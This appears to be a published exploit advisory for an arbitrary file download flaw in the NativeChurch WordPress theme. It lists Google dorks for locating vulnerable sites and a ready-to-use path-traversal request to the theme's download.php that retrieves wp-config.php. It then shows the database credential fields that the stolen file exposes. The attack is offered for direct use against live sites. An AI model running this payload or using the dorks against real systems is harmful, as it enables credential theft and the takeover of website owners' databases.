#################################################################### # Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 26/02/2019 # Vendor Homepage : themeforest.net # Software Information Link : themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446 # Software Affected Versions : WordPress From 3.9 to 5.0.x Compatible with Bootstrap 3.x - bbPress 2.5.x From WooCommerce 2.1.x To WooCommerce 3.4.x, # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/" inurl:''inurl:/wp-content/themes/NativeChurch/download/'' # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] CWE-23 [ Relative Path Traversal ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : packetstormsecurity.com/files/151851/WordPress-NativeChurch-Multi-Purpose-5.0.x-File-Download.html #################################################################### # Description about Software : *************************** NativeChurch is a powerful WordPress Theme designed & developed for Church, Charity, Non-Profit and Religious Websites and comes handy for Portfolio/Corporate Websites as well. #################################################################### # Impact : *********** * The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. Attackers can use a browser to exploit this issue. * The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. #################################################################### # Arbitrary File Download Exploit : ****************************** /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php # Example Informations about MySQL WordPress Configuration File : *********************************************************** /** Nom de la base de données de WordPress. */ define('DB_NAME', /** Utilisateur de la base de données MySQL. */ define('DB_USER', /** Mot de passe de la base de données MySQL. */ define('DB_PASSWORD', /** Adresse de l'hébergement MySQL. */ define('DB_HOST', ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################